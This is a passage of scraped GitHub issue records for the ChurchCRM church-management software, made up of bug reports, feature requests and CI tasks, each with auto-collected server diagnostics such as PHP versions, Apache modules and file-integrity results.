Integrity check status |{"status":"failure","message":"One or more files failed signature validation","files":[{"filename":"api\/routes\/people\/people-properties.php","status":"Hash Mismatch","expectedhash":"1fe54769c22002007bb4f37c2e13f7a20ded2b11","actualhash":"102b10024260cb7c6a00c1073583622aa0819943"},{"filename":"api\/routes\/system\/system-database.php","status":"Hash Mismatch","expectedhash":"04ff0512ae7a60dde7bb85ff0aefab038aa11f1c","actualhash":"b6b1710c6a0b51be8f100eb51b4619954bea4ec6"},{"filename":"ChurchCRM\/Authentication\/AuthenticationProviders\/APITokenAuthentication.php","status":"Hash Mismatch","expectedhash":"fba6ee157c34f26e8084ef8320efeebeb3a72d42","actualhash":"211cbfdb56029ff79fafcbade6db607eb8c818bc"},{"filename":"ChurchCRM\/Bootstrapper.php","status":"Hash Mismatch","expectedhash":"18462b9dd6606f30fa80baff42d01b08e27513b2","actualhash":"cb09b0968b79e6eeb74a819b40ab1b372107b6e7"},{"filename":"ChurchCRM\/dto\/SystemConfig.php","status":"Hash Mismatch","expectedhash":"bc96e8c179cec54a9319203aed01ee2f1e815e24","actualhash":"a2ebcbd5d182fe9c8bce46a373e17b350deb42f7"},{"filename":"ChurchCRM\/Service\/AppIntegrityService.php","status":"Hash Mismatch","expectedhash":"2d3858ca5cf1c5663a9801ffb621852cf70083d1","actualhash":"859e8d9f3efe00e874424b01b80574516b1b9045"},{"filename":"ChurchCRM\/Service\/SystemService.php","status":"Hash Mismatch","expectedhash":"ae0bcb5d326f2c4aa837a6b0e714d375ee0badd1","actualhash":"42568408823bb03b1f8ade0cd69949c74c1156c0"},{"filename":"ChurchCRM\/Slim\/Middleware\/Request\/FamilyAPIMiddleware.php","status":"Hash Mismatch","expectedhash":"ac75d814e44311f4579263c7b70d5d1738fdc764","actualhash":"755c7364bd94cf57f2c05dc64da5b1ff93236094"},{"filename":"ChurchCRM\/Slim\/Middleware\/Request\/GroupAPIMiddleware.php","status":"Hash Mismatch","expectedhash":"e1e24060a9c4ee191dfd34d42287566324f5e269","actualhash":"ff5edb4bf6f8a85222d9c18bef196a7732286e71"},{"filename":"ChurchCRM\/Slim\/Middleware\/Request\/PersonAPIMiddleware.php","status":"Hash Mismatch","expectedhash":"a640e0e5029d44093b295262dc57ff9ebedc43a9","actualhash":"ad7367438c2504f63a3651f3987657073c49b845"},{"filename":"ChurchCRM\/tasks\/PHPPendingDeprecationVersionCheckTask.php","status":"Hash Mismatch","expectedhash":"e5400538c5a3eaf807703eec58f936b575328920","actualhash":"58a0011a7eceb6abf8dcc1ce1d54c731e23498e8"},{"filename":"FamilyEditor.php","status":"Hash Mismatch","expectedhash":"e685b0504e5eefb980358b6487e4bd87c9843665","actualhash":"3c4fd2dac15f67ac88dcf0e7686483dd58b9c44d"},{"filename":"Include\/Footer.php","status":"Hash Mismatch","expectedhash":"0b9046ea6fca49e5a7950c7e765269cb3238cb8b","actualhash":"8c50728611a8f13c35bfd5b798af840cbc129e4f"},{"filename":"Include\/FooterNotLoggedIn.php","status":"Hash Mismatch","expectedhash":"5678f485d6d9a10cec2a1692be047559be5c3264","actualhash":"8a965015d83f57fa390ba79bd268e67f730d92d2"},{"filename":"Menu.php","status":"Hash Mismatch","expectedhash":"268fafdc2a1f917628649959cce329602501066d","actualhash":"cd027c65b7060f95e3ef8d84dfc99b968e2b4b72"},{"filename":"PersonView.php","status":"Hash Mismatch","expectedhash":"f8fb886656cf7712cad2311bc661419f25eb6445","actualhash":"156439b4f897f669f661ebc7091052b1a4c276e4"},{"filename":"PropertyAssign.php","status":"Hash Mismatch","expectedhash":"3e2f49dc21e04388632850991727aac77d1e6e59","actualhash":"ae8c15913caa985fbcb1d29de8d80f296d283f68"},{"filename":"PropertyUnassign.php","status":"Hash Mismatch","expectedhash":"01e2556fb0ae5225e8daf35cc359d325c7786801","actualhash":"3e1c907c416e694f3ff0979ba30f048f82887fbe"},{"filename":"SystemSettings.php","status":"Hash Mismatch","expectedhash":"dea9b8e60dac418fe287309c452667bcb2f2d8a0","actualhash":"112ede4daedc6fdaae54a139f0a3f04d5d26aa53"},{"filename":"v2\/templates\/people\/family-view.php","status":"Hash Mismatch","expectedhash":"166099fd2ea388df3ca1763a92e91413b3c53d49","actualhash":"eb6ec4c346420803b4ee97b3fae6093e8c24581d"},{"filename":"locale\/js\/es_ES.js","status":"Hash Mismatch","expectedhash":"765faefba7d3ddf70a9ca9c68d21d38d861c6c37","actualhash":"e652ebca52003a81111a13598f83bf62bfdef8e9"},{"filename":"locale\/js\/pl_PL.js","status":"Hash Mismatch","expectedhash":"95dc81cd4b799e64ec684403dbc01471f9af57a5","actualhash":"fceaec44783d50d13352a8548ec61ee57bfe1e5d"},{"filename":"locale\/js\/ru_RU.js","status":"Hash Mismatch","expectedhash":"20e30d6cda238c1298c4a09cd163213b46ca0f12","actualhash":"99a8eb637052a57fa01f49b78c3fb38a631d76b4"},{"filename":"locale\/js\/sv_SE.js","status":"Hash Mismatch","expectedhash":"ce5d751fbeced514f75bf42b003985e60412e777","actualhash":"166bd29157bfdcd199e6c2be42b5476adf162806"},{"filename":"locale\/js\/zh_TW.js","status":"Hash Mismatch","expectedhash":"32528057dff697319aff4ee1926db04819351c7f","actualhash":"84a41f6e36a40901016e1858c736fa8ffd6742b0"},{"filename":"skin\/external\/bootbox\/bootbox.min.js","status":"Hash Mismatch","expectedhash":"e655b99d8331bc19f0e1d7969626845980ba3c79","actualhash":"b5563d0de122d9477e5bc69628396d5cb1f427f7"},{"filename":"skin\/external\/i18next\/i18next.min.js","status":"Hash Mismatch","expectedhash":"ea742df36cbfe6d09a8ef6d44df6e0adf43aa5e5","actualhash":"e62716ccc17dbc1b43e7046fe0fd4b03e6a882db"},{"filename":"skin\/js\/FamilyView.js","status":"Hash Mismatch","expectedhash":"94d503ed1c20ff254ed748bbd40d7148b05c68b1","actualhash":"ee39865ab2b04eceafe17744c38bce3901d66c66"},{"filename":"skin\/js\/PersonView.js","status":"Hash Mismatch","expectedhash":"3b241712e5fdc1c335f1d40e816aa1035ef57f76","actualhash":"094148ba1c1a33acea976e79dca01146e4a3b007"}]}
Apache Modules |core,mod_ssl,prefork,http_core,mod_so,mod_authn_file,mod_authn_dbm,mod_authn_anon,mod_authn_dbd,mod_authn_default,mod_authz_host,mod_authz_groupfile,mod_authz_user,mod_authz_dbm,mod_authz_owner,mod_authz_default,mod_auth_basic,mod_auth_digest,mod_file_cache,mod_cache,mod_disk_cache,mod_mem_cache,mod_dbd,mod_bucketeer,mod_dumpio,mod_case_filter,mod_case_filter_in,mod_reqtimeout,mod_ext_filter,mod_include,mod_filter,mod_substitute,mod_charset_lite,mod_deflate,mod_log_config,mod_logio,mod_env,mod_mime_magic,mod_cern_meta,mod_expires,mod_headers,mod_ident,mod_usertrack,mod_setenvif,mod_version,mod_proxy,mod_proxy_connect,mod_proxy_ftp,mod_proxy_http,mod_proxy_scgi,mod_proxy_ajp,mod_proxy_balancer,mod_mime,mod_dav,mod_status,mod_autoindex,mod_asis,mod_info,mod_cgi,mod_fastcgi,mod_cgid,mod_dav_fs,mod_vhost_alias,mod_negotiation,mod_dir,mod_imagemap,mod_actions,mod_speling,mod_userdir,mod_alias,mod_rewrite,mod_perl,mod_wsgi,mod_xsendfile,mod_php7 | 404 - pdfmake.min.js.map | https://api.github.com/repos/ChurchCRM/CRM/issues/5432/comments | 0 | 2020-10-16T15:45:19Z | 2020-10-16T15:47:27Z | https://github.com/ChurchCRM/CRM/issues/5432 | 723,333,967 | 5,432 |
[
"ChurchCRM",
"CRM"
] | We get lots of comments about the site language is changed etc... we can do a curl command with API token to reset the dB, next user will login to a fresh DB. | GitHub Action: Reset Demo DB every x Hours | https://api.github.com/repos/ChurchCRM/CRM/issues/5431/comments | 0 | 2020-10-16T00:45:07Z | 2021-08-05T17:54:15Z | https://github.com/ChurchCRM/CRM/issues/5431 | 722,778,264 | 5,431 |
[
"ChurchCRM",
"CRM"
] | Trying to run the "Families without Emails" report.
For logs and details see:
https://github.com/ChurchCRM/CRM/issues/5217
Collected Value Title | Data
----------------------|----------------
Page Name |/v2/index.php
Screen Size |1080x1920
Window Size |938x1920
Page Size |938x1920
Platform Information | Linux ecbiz250.inmotionhosting.com 3.10.0-962.3.2.lve1.5.38.el7.x86_64 #1 SMP Thu Jun 18 05:28:41 EDT 2020 x86_64
PHP Version | 7.3.21
SQL Version | 5.5.5-10.2.33-MariaDB-log
ChurchCRM Version |4.1.4
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Prerequisite Status |Missing Prerequisites: ["Mod Rewrite or Equivalent"]
Integrity check status |{"status":"success"}
| Families Without Emails report fails | https://api.github.com/repos/ChurchCRM/CRM/issues/5430/comments | 19 | 2020-10-15T17:10:19Z | 2023-11-10T13:31:01Z | https://github.com/ChurchCRM/CRM/issues/5430 | 722,516,342 | 5,430 |
[
"ChurchCRM",
"CRM"
] | Hy there! I am using CHURCH CRM on a christian community with over 1.000 members in Romania. All things are good, but on deposit section we need 1 of 2 these options. To have a currency option in Localization (RON = romanian currency), or either to have one deposit in multiple currencies. For example: Deposit #10 has 1.000 EUR, 500 USD and 12.000 RON. I Think this will be a great job from CHURCH CRM TEAM. God bless and best wishes. You do a great job! | CURRENCY OPTION NOT AVAILABLE IN DEPOSITS or LOCALIZATION | https://api.github.com/repos/ChurchCRM/CRM/issues/5427/comments | 9 | 2020-10-15T10:48:02Z | 2024-01-09T02:08:54Z | https://github.com/ChurchCRM/CRM/issues/5427 | 722,220,316 | 5,427 |
[
"ChurchCRM",
"CRM"
] |
Friend good night.
I'm Brazilian and I'm starting to install your system.
(as I don't speak English, I'm using the google translator)
However, as soon as I do the installation, the system does not redirect me to create a new account and password.
it already sends me to the login screen.
So I don't have a registered user to login. | CREATE USER ERROR | https://api.github.com/repos/ChurchCRM/CRM/issues/5425/comments | 2 | 2020-10-15T04:39:28Z | 2020-10-15T15:56:39Z | https://github.com/ChurchCRM/CRM/issues/5425 | 721,966,623 | 5,425 |
[
"ChurchCRM",
"CRM"
] | Each Church member has office status and baptism record and Church wants to track them:
- Deacon, Elder and so on
- Infant Baptism, Baptism and on
Actually,
if admin modify field labels. for example, Title --> Office and Suffix --> Baptism , then i am satisfied.
| Need some fileds for database of personal - office and baptism status | https://api.github.com/repos/ChurchCRM/CRM/issues/5420/comments | 4 | 2020-10-14T22:28:33Z | 2020-10-15T13:50:54Z | https://github.com/ChurchCRM/CRM/issues/5420 | 721,834,995 | 5,420 |
[
"ChurchCRM",
"CRM"
] | For some reason, sometime in the past week we stopped being able to log in to our installation. Same behaviour for all users: We sign in with our passwords, but are simply returned to the login page (/session/begin). Reset our passwords, successfully received reset links and changed those, same result. And the auth log shows, for example, '[2020-10-14 09:48:39] authLogger.INFO: User succefully logged in without 2FA: Admin []'. There do not appear to be any indications of errors in the server's logs either (those I can access through cPanel). Any ideas?
#### On what page in the application did you find this issue?
/session/begin
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
Shared hosting, Linux
#### What browser (and version) are you running?
Problem is manifest on Firefox (latest)/Windows AND MacOS, as well as Safari (MacOS 10.13)
#### What version of PHP is the server running?
7.2
#### What version of SQL Server are you running?
10.2.33-MariaDB-cll-lve
#### What version of ChurchCRM are you running?
4.1.0 | Existing installation, suddently stuck at Login page | https://api.github.com/repos/ChurchCRM/CRM/issues/5419/comments | 2 | 2020-10-14T17:06:48Z | 2020-10-15T03:08:39Z | https://github.com/ChurchCRM/CRM/issues/5419 | 721,633,079 | 5,419 |
[
"ChurchCRM",
"CRM"
] | When you are using a non-admin and trying to view an admin person #1 you get the following error
( ! ) Fatal error: Uncaught Error: Call to a member function getId() on null in /Users/dawoudio/development/churchcrm/CRM/src/PersonView.php on line 428
( ! ) Error: Call to a member function getId() on null in /Users/dawoudio/development/churchcrm/CRM/src/PersonView.php on line 428
Collected Value Title | Data
----------------------|----------------
Page Name |/PersonView.php
Screen Size |2160x3840
Window Size |914x1680
Page Size |914x1680
Platform Information | Darwin dawouds.lan 20.1.0 Darwin Kernel Version 20.1.0: Thu Sep 24 20:22:06 PDT 2020; root:xnu-7195.40.89.100.3~1/RELEASE_X86_64 x86_64
PHP Version | 7.3.9
SQL Version | 5.7.26
ChurchCRM Version |4.2.0
Reporting Browser |Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"failure","message":"Signature definition File Missing"}
Apache Modules |core,mod_ssl,prefork,http_core,mod_so,mod_authn_file,mod_authn_dbm,mod_authn_anon,mod_authn_dbd,mod_authn_default,mod_authz_host,mod_authz_groupfile,mod_authz_user,mod_authz_dbm,mod_authz_owner,mod_authz_default,mod_auth_basic,mod_auth_digest,mod_file_cache,mod_cache,mod_disk_cache,mod_mem_cache,mod_dbd,mod_bucketeer,mod_dumpio,mod_case_filter,mod_case_filter_in,mod_reqtimeout,mod_ext_filter,mod_include,mod_filter,mod_substitute,mod_charset_lite,mod_deflate,mod_log_config,mod_logio,mod_env,mod_mime_magic,mod_cern_meta,mod_expires,mod_headers,mod_ident,mod_usertrack,mod_setenvif,mod_version,mod_proxy,mod_proxy_connect,mod_proxy_ftp,mod_proxy_http,mod_proxy_scgi,mod_proxy_ajp,mod_proxy_balancer,mod_mime,mod_dav,mod_status,mod_autoindex,mod_asis,mod_info,mod_cgi,mod_fastcgi,mod_cgid,mod_dav_fs,mod_vhost_alias,mod_negotiation,mod_dir,mod_imagemap,mod_actions,mod_speling,mod_userdir,mod_alias,mod_rewrite,mod_perl,mod_wsgi,mod_xsendfile,mod_php7 | Error with Person view for non-admin | https://api.github.com/repos/ChurchCRM/CRM/issues/5417/comments | 1 | 2020-10-14T15:04:36Z | 2020-10-14T16:02:49Z | https://github.com/ChurchCRM/CRM/issues/5417 | 721,541,552 | 5,417 |
[
"ChurchCRM",
"CRM"
] | does not match other tabs
Collected Value Title | Data
----------------------|----------------
Page Name |/SystemSettings.php
Screen Size |2160x3840
Window Size |914x1680
Page Size |1178x1910
Platform Information | Darwin dawouds.lan 20.1.0 Darwin Kernel Version 20.1.0: Thu Sep 24 20:22:06 PDT 2020; root:xnu-7195.40.89.100.3~1/RELEASE_X86_64 x86_64
PHP Version | 7.3.9
SQL Version | 5.7.26
ChurchCRM Version |4.2.0
Reporting Browser |Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"failure","message":"Signature definition File Missing"}
Apache Modules |core,mod_ssl,prefork,http_core,mod_so,mod_authn_file,mod_authn_dbm,mod_authn_anon,mod_authn_dbd,mod_authn_default,mod_authz_host,mod_authz_groupfile,mod_authz_user,mod_authz_dbm,mod_authz_owner,mod_authz_default,mod_auth_basic,mod_auth_digest,mod_file_cache,mod_cache,mod_disk_cache,mod_mem_cache,mod_dbd,mod_bucketeer,mod_dumpio,mod_case_filter,mod_case_filter_in,mod_reqtimeout,mod_ext_filter,mod_include,mod_filter,mod_substitute,mod_charset_lite,mod_deflate,mod_log_config,mod_logio,mod_env,mod_mime_magic,mod_cern_meta,mod_expires,mod_headers,mod_ident,mod_usertrack,mod_setenvif,mod_version,mod_proxy,mod_proxy_connect,mod_proxy_ftp,mod_proxy_http,mod_proxy_scgi,mod_proxy_ajp,mod_proxy_balancer,mod_mime,mod_dav,mod_status,mod_autoindex,mod_asis,mod_info,mod_cgi,mod_fastcgi,mod_cgid,mod_dav_fs,mod_vhost_alias,mod_negotiation,mod_dir,mod_imagemap,mod_actions,mod_speling,mod_userdir,mod_alias,mod_rewrite,mod_perl,mod_wsgi,mod_xsendfile,mod_php7 | User Setup tab case issue | https://api.github.com/repos/ChurchCRM/CRM/issues/5415/comments | 0 | 2020-10-14T07:53:23Z | 2020-10-14T07:55:40Z | https://github.com/ChurchCRM/CRM/issues/5415 | 721,230,605 | 5,415 |
[
"ChurchCRM",
"CRM"
] | page shows https://churchcrm:8890/v2/family/1
but bug reoprt shows /v2/index.php
Collected Value Title | Data
----------------------|----------------
Page Name |/v2/index.php
Screen Size |2160x3840
Window Size |914x1680
Page Size |1961x1680
Platform Information | Darwin dawouds.lan 20.1.0 Darwin Kernel Version 20.1.0: Thu Sep 24 20:22:06 PDT 2020; root:xnu-7195.40.89.100.3~1/RELEASE_X86_64 x86_64
PHP Version | 7.3.9
SQL Version | 5.7.26
ChurchCRM Version |4.2.0
Reporting Browser |Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"failure","message":"Signature definition File Missing"}
Apache Modules |core,mod_ssl,prefork,http_core,mod_so,mod_authn_file,mod_authn_dbm,mod_authn_anon,mod_authn_dbd,mod_authn_default,mod_authz_host,mod_authz_groupfile,mod_authz_user,mod_authz_dbm,mod_authz_owner,mod_authz_default,mod_auth_basic,mod_auth_digest,mod_file_cache,mod_cache,mod_disk_cache,mod_mem_cache,mod_dbd,mod_bucketeer,mod_dumpio,mod_case_filter,mod_case_filter_in,mod_reqtimeout,mod_ext_filter,mod_include,mod_filter,mod_substitute,mod_charset_lite,mod_deflate,mod_log_config,mod_logio,mod_env,mod_mime_magic,mod_cern_meta,mod_expires,mod_headers,mod_ident,mod_usertrack,mod_setenvif,mod_version,mod_proxy,mod_proxy_connect,mod_proxy_ftp,mod_proxy_http,mod_proxy_scgi,mod_proxy_ajp,mod_proxy_balancer,mod_mime,mod_dav,mod_status,mod_autoindex,mod_asis,mod_info,mod_cgi,mod_fastcgi,mod_cgid,mod_dav_fs,mod_vhost_alias,mod_negotiation,mod_dir,mod_imagemap,mod_actions,mod_speling,mod_userdir,mod_alias,mod_rewrite,mod_perl,mod_wsgi,mod_xsendfile,mod_php7 | Bug report does not work with v2 pages | https://api.github.com/repos/ChurchCRM/CRM/issues/5413/comments | 0 | 2020-10-14T07:26:52Z | 2020-11-16T03:46:05Z | https://github.com/ChurchCRM/CRM/issues/5413 | 721,214,752 | 5,413 |
[
"ChurchCRM",
"CRM"
] | Uncaught TypeError: Cannot read property 'mData' of undefined
at HTMLTableCellElement.<anonymous> (datatables.min.js:117)
at Function.each (jquery.min.js:2)
at S.fn.init.each (jquery.min.js:2)
at HTMLTableElement.<anonymous> (datatables.min.js:117)
at Function.each (jquery.min.js:2)
at S.fn.init.each (jquery.min.js:2)
at S.fn.init.n [as dataTable] (datatables.min.js:110)
at HTMLDocument.<anonymous> (DataTables.js:3)
at e (jquery.min.js:2)
at t (jquery.min.js:2)
Collected Value Title | Data
----------------------|----------------
Page Name |/v2/index.php
Screen Size |2160x3840
Window Size |914x1680
Page Size |1961x1680
Platform Information | Darwin dawouds.lan 20.1.0 Darwin Kernel Version 20.1.0: Thu Sep 24 20:22:06 PDT 2020; root:xnu-7195.40.89.100.3~1/RELEASE_X86_64 x86_64
PHP Version | 7.3.9
SQL Version | 5.7.26
ChurchCRM Version |4.2.0
Reporting Browser |Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"failure","message":"Signature definition File Missing"}
Apache Modules |core,mod_ssl,prefork,http_core,mod_so,mod_authn_file,mod_authn_dbm,mod_authn_anon,mod_authn_dbd,mod_authn_default,mod_authz_host,mod_authz_groupfile,mod_authz_user,mod_authz_dbm,mod_authz_owner,mod_authz_default,mod_auth_basic,mod_auth_digest,mod_file_cache,mod_cache,mod_disk_cache,mod_mem_cache,mod_dbd,mod_bucketeer,mod_dumpio,mod_case_filter,mod_case_filter_in,mod_reqtimeout,mod_ext_filter,mod_include,mod_filter,mod_substitute,mod_charset_lite,mod_deflate,mod_log_config,mod_logio,mod_env,mod_mime_magic,mod_cern_meta,mod_expires,mod_headers,mod_ident,mod_usertrack,mod_setenvif,mod_version,mod_proxy,mod_proxy_connect,mod_proxy_ftp,mod_proxy_http,mod_proxy_scgi,mod_proxy_ajp,mod_proxy_balancer,mod_mime,mod_dav,mod_status,mod_autoindex,mod_asis,mod_info,mod_cgi,mod_fastcgi,mod_cgid,mod_dav_fs,mod_vhost_alias,mod_negotiation,mod_dir,mod_imagemap,mod_actions,mod_speling,mod_userdir,mod_alias,mod_rewrite,mod_perl,mod_wsgi,mod_xsendfile,mod_php7 | JS error on Family View | https://api.github.com/repos/ChurchCRM/CRM/issues/5412/comments | 0 | 2020-10-14T07:25:00Z | 2020-10-14T07:49:03Z | https://github.com/ChurchCRM/CRM/issues/5412 | 721,213,595 | 5,412 |
[
"ChurchCRM",
"CRM"
] |
Collected Value Title | Data
----------------------|----------------
Page Name |/v2/index.php
Screen Size |2160x3840
Window Size |914x1680
Page Size |1961x1680
Platform Information | Darwin dawouds.lan 20.1.0 Darwin Kernel Version 20.1.0: Thu Sep 24 20:22:06 PDT 2020; root:xnu-7195.40.89.100.3~1/RELEASE_X86_64 x86_64
PHP Version | 7.3.9
SQL Version | 5.7.26
ChurchCRM Version |4.2.0
Reporting Browser |Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"failure","message":"Signature definition File Missing"}
Apache Modules |core,mod_ssl,prefork,http_core,mod_so,mod_authn_file,mod_authn_dbm,mod_authn_anon,mod_authn_dbd,mod_authn_default,mod_authz_host,mod_authz_groupfile,mod_authz_user,mod_authz_dbm,mod_authz_owner,mod_authz_default,mod_auth_basic,mod_auth_digest,mod_file_cache,mod_cache,mod_disk_cache,mod_mem_cache,mod_dbd,mod_bucketeer,mod_dumpio,mod_case_filter,mod_case_filter_in,mod_reqtimeout,mod_ext_filter,mod_include,mod_filter,mod_substitute,mod_charset_lite,mod_deflate,mod_log_config,mod_logio,mod_env,mod_mime_magic,mod_cern_meta,mod_expires,mod_headers,mod_ident,mod_usertrack,mod_setenvif,mod_version,mod_proxy,mod_proxy_connect,mod_proxy_ftp,mod_proxy_http,mod_proxy_scgi,mod_proxy_ajp,mod_proxy_balancer,mod_mime,mod_dav,mod_status,mod_autoindex,mod_asis,mod_info,mod_cgi,mod_fastcgi,mod_cgid,mod_dav_fs,mod_vhost_alias,mod_negotiation,mod_dir,mod_imagemap,mod_actions,mod_speling,mod_userdir,mod_alias,mod_rewrite,mod_perl,mod_wsgi,mod_xsendfile,mod_php7 | MailChimp: 412 (Precondition Failed) | https://api.github.com/repos/ChurchCRM/CRM/issues/5411/comments | 0 | 2020-10-14T07:09:10Z | 2020-10-15T14:07:29Z | https://github.com/ChurchCRM/CRM/issues/5411 | 721,204,247 | 5,411 |
[
"ChurchCRM",
"CRM"
] | 1. Log into ChurchCRM (usually first login)
2. Enter 2FA code
3. Page loads but stalls while stats/numbers and latest/updated persons load.
After this initial delay, the system runs normally, but this will occur for all users on their first login for the day (browser caching results to avoid subsequent delays?)
Collected Value Title | Data
----------------------|----------------
Page Name |/Menu.php
Screen Size |2560x1440
Window Size |1408x1443
Page Size |1417x1443
Platform Information | Linux web1 4.19.0-11-cloud-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64
PHP Version | 7.4.11
SQL Version | 5.5.5-10.3.23-MariaDB-0+deb10u1
ChurchCRM Version |4.1.4
Reporting Browser |Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_cgi,mod_deflate,mod_dir,mod_env,mod_expires,mod_filter,mod_mime,prefork,mod_negotiation,mod_instaweb,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_socache_shmcb,mod_speling,mod_ssl,mod_status | Delay on dashboard after login | https://api.github.com/repos/ChurchCRM/CRM/issues/5409/comments | 8 | 2020-10-14T02:58:27Z | 2020-10-18T23:42:58Z | https://github.com/ChurchCRM/CRM/issues/5409 | 721,093,545 | 5,409 |
[
"ChurchCRM",
"CRM"
] |
Collected Value Title | Data
----------------------|----------------
Page Name |/Menu.php
Screen Size |1200x1920
Window Size |979x1680
Page Size |1733x1680
Platform Information | Darwin dawouds.lan 20.1.0 Darwin Kernel Version 20.1.0: Thu Sep 24 20:22:06 PDT 2020; root:xnu-7195.40.89.100.3~1/RELEASE_X86_64 x86_64
PHP Version | 7.3.9
SQL Version | 5.7.26
ChurchCRM Version |4.2.0
Reporting Browser |Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"failure","message":"Signature definition File Missing"}
Apache Modules |core,mod_ssl,prefork,http_core,mod_so,mod_authn_file,mod_authn_dbm,mod_authn_anon,mod_authn_dbd,mod_authn_default,mod_authz_host,mod_authz_groupfile,mod_authz_user,mod_authz_dbm,mod_authz_owner,mod_authz_default,mod_auth_basic,mod_auth_digest,mod_file_cache,mod_cache,mod_disk_cache,mod_mem_cache,mod_dbd,mod_bucketeer,mod_dumpio,mod_case_filter,mod_case_filter_in,mod_reqtimeout,mod_ext_filter,mod_include,mod_filter,mod_substitute,mod_charset_lite,mod_deflate,mod_log_config,mod_logio,mod_env,mod_mime_magic,mod_cern_meta,mod_expires,mod_headers,mod_ident,mod_usertrack,mod_setenvif,mod_version,mod_proxy,mod_proxy_connect,mod_proxy_ftp,mod_proxy_http,mod_proxy_scgi,mod_proxy_ajp,mod_proxy_balancer,mod_mime,mod_dav,mod_status,mod_autoindex,mod_asis,mod_info,mod_cgi,mod_fastcgi,mod_cgid,mod_dav_fs,mod_vhost_alias,mod_negotiation,mod_dir,mod_imagemap,mod_actions,mod_speling,mod_userdir,mod_alias,mod_rewrite,mod_perl,mod_wsgi,mod_xsendfile,mod_php7 | Deposit Tracking - Chart broken | https://api.github.com/repos/ChurchCRM/CRM/issues/5408/comments | 1 | 2020-10-14T02:56:37Z | 2020-10-14T03:49:58Z | https://github.com/ChurchCRM/CRM/issues/5408 | 721,092,937 | 5,408 |
[
"ChurchCRM",
"CRM"
] | right now the upload is done via Travis CI and should be moved to an action
see https://github.com/ChurchCRM/CRM/blob/master/scripts/update-demo-site.php | Github Action: update-demo-site | https://api.github.com/repos/ChurchCRM/CRM/issues/5406/comments | 1 | 2020-10-13T22:55:10Z | 2021-07-09T20:19:39Z | https://github.com/ChurchCRM/CRM/issues/5406 | 720,952,041 | 5,406 |
[
"ChurchCRM",
"CRM"
] | use Newman CLI POSTMAN runner to test APIs on the deployed system. | Github Action: Run nightly test on the Demo Site to ensure stability | https://api.github.com/repos/ChurchCRM/CRM/issues/5405/comments | 2 | 2020-10-13T21:12:56Z | 2023-11-05T02:16:48Z | https://github.com/ChurchCRM/CRM/issues/5405 | 720,845,060 | 5,405 |
[
"ChurchCRM",
"CRM"
] | We should have a Family ID and Person ID as columns in the CVS
Collected Value Title | Data
----------------------|----------------
Page Name |/master/CSVExport.php
Screen Size |2160x3840
Window Size |1946x1906
Page Size |1946x1906
Platform Information | Linux az1-ss27.a2hosting.com 3.10.0-962.3.2.lve1.5.26.4.el7.x86_64 #1 SMP Wed Sep 11 10:29:54 EDT 2019 x86_64
PHP Version | 7.3.23
SQL Version | 10.3.23-MariaDB-cll-lve
ChurchCRM Version |4.2.0
Reporting Browser |Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |mod_rewrite,mod_mime,mod_headers,mod_expires,mod_auth_basic | Export to CVS does not include family/person id | https://api.github.com/repos/ChurchCRM/CRM/issues/5404/comments | 0 | 2020-10-13T20:47:36Z | 2020-10-16T15:48:43Z | https://github.com/ChurchCRM/CRM/issues/5404 | 720,815,981 | 5,404 |
[
"ChurchCRM",
"CRM"
] | Need to remove testing for 7.2 and set new min PHP version to 7.3
PHP 7.2 EOF is 30 Nov 2020 - https://www.php.net/supported-versions.php
| Remove PHP 7.2 support | https://api.github.com/repos/ChurchCRM/CRM/issues/5403/comments | 0 | 2020-10-13T20:37:27Z | 2020-10-15T14:07:47Z | https://github.com/ChurchCRM/CRM/issues/5403 | 720,803,701 | 5,403 |
[
"ChurchCRM",
"CRM"
] | cleanup where it does not break the current system without major changes | 4.2.0 Upgrade JS and PHP libs to latest minor/patch | https://api.github.com/repos/ChurchCRM/CRM/issues/5402/comments | 0 | 2020-10-13T20:35:34Z | 2020-10-18T00:43:07Z | https://github.com/ChurchCRM/CRM/issues/5402 | 720,801,389 | 5,402 |
[
"ChurchCRM",
"CRM"
] | when a change is committed to 'master' run
- npm install/audit
- npm run composer install/update
| Github Action: update & audit npm and composer | https://api.github.com/repos/ChurchCRM/CRM/issues/5401/comments | 0 | 2020-10-13T20:34:05Z | 2020-10-13T20:34:36Z | https://github.com/ChurchCRM/CRM/issues/5401 | 720,799,607 | 5,401 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.